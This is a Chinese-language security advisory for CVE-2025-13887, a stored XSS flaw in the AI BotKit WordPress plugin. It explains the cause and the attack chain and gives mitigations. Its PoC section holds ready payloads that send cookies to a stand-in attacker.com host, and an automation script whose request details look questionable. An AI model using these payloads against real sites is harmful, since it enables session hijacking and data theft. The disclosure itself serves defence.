CVE-2025-13887 WordPress AI BotKit插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13887

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

AI BotKit – AI Chatbot & Live Support for WordPress

漏洞概述

AI BotKit是WordPress平台上的一款AI聊天机器人和在线客服支持插件。该插件在1.1.7及以下版本中存在严重的存储型跨站脚本（Stored XSS）漏洞。漏洞根源在于插件的`ai_botkit_widget`短代码处理中，对'id'参数缺乏充分的输入清理和输出转义。攻击者利用此漏洞可注入任意Web脚本（如JavaScript），这些恶意代码会被永久存储在数据库中。当其他用户访问包含恶意代码的页面时，攻击脚本将自动执行，可能导致会话劫持、敏感数据窃取、管理后台权限提升等严重后果。由于该插件被广泛应用于企业官网和电子商务平台，漏洞影响范围较大。

技术细节

漏洞存在于插件的短代码处理模块中，文件路径为：includes/public/class-shortcode-handler.php（第42行附近）。具体问题在于：1）当用户通过`[ai_botkit_widget id='xxx']`短代码调用插件功能时，'id'参数的用户输入未被正确清理；2）该参数值在后续输出时直接嵌入HTML页面，缺少必要的输出转义处理。攻击者只需构造形如：`[ai_botkit_widget id='"><script>alert(document.cookie)</script>']`的短代码，即可将恶意脚本注入页面。由于WordPress的短代码可在文章、页面或评论中被 Contributor 及以上权限用户使用，具有相应权限的认证攻击者可轻松利用此漏洞。恶意脚本随页面加载自动执行，影响所有访问该页面的用户。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用的WordPress版本及AI BotKit插件版本（≤1.1.7）

STEP 2

权限获取

攻击者获取WordPress Contributor级别或更高权限的账户（通过钓鱼、弱密码或内部渗透）

STEP 3

恶意载荷构造

构造包含XSS payload的'ai_botkit_widget'短代码，如：[ai_botkit_widget id='"><script>恶意代码</script>']

STEP 4

漏洞注入

通过WordPress文章/页面编辑器或API将恶意短代码插入页面内容，提交保存

STEP 5

持久化存储

恶意脚本随页面内容被永久存储在WordPress数据库中

STEP 6

触发执行

普通用户访问包含恶意短代码的页面时，浏览器自动解析并执行注入的JavaScript脚本

STEP 7

数据窃取

恶意脚本窃取用户Cookie、会话令牌或其他敏感信息，并发送到攻击者控制的服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- WordPress AI BotKit Stored XSS PoC -->
<!-- Author: Contributor+ role required -->

<!-- Method 1: Via WordPress Post/Page Editor -->
[ai_botkit_widget id='"><script>alert('XSS - Cookie: '+document.cookie)</script>']

<!-- Method 2: More Obfuscated Version -->
[ai_botkit_widget id='"><img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>']

<!-- Method 3: Session Hijacking Payload -->
[ai_botkit_widget id='"><script>document.location='https://attacker.com/log?cookie='+document.cookie</script>']

<!-- Exploit Automation Script -->
<script>
// Auto-exploit for WordPress with AI BotKit plugin
const xssPayload = "'><script>fetch('https://attacker.com/steal?data='+btoa(JSON.stringify({cookie: document.cookie, url: location.href})))</script>";

// Simulate adding shortcode to post
fetch('/wp-admin/admin-ajax.php', {
    method: 'POST',
    headers: {'Content-Type': 'application/x-www-form-urlencoded'},
    body: 'action=editpost&post_ID=1&content=[ai_botkit_widget id="'+xssPayload+'"]&_wpnonce='+document.querySelector('#_wpnonce').value
});
</script>

影响范围

AI BotKit for WordPress ≤ 1.1.7

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时措施：1）禁用或删除AI BotKit插件；2）使用WordPress安全插件启用XSS防护规则；3）限制低权限用户创建和编辑文章的权限；4）添加CSP响应头限制脚本执行；5）使用Web应用防火墙（WAF）过滤恶意请求参数；6）加强用户权限管理，避免授予不信任用户Contributor或更高权限。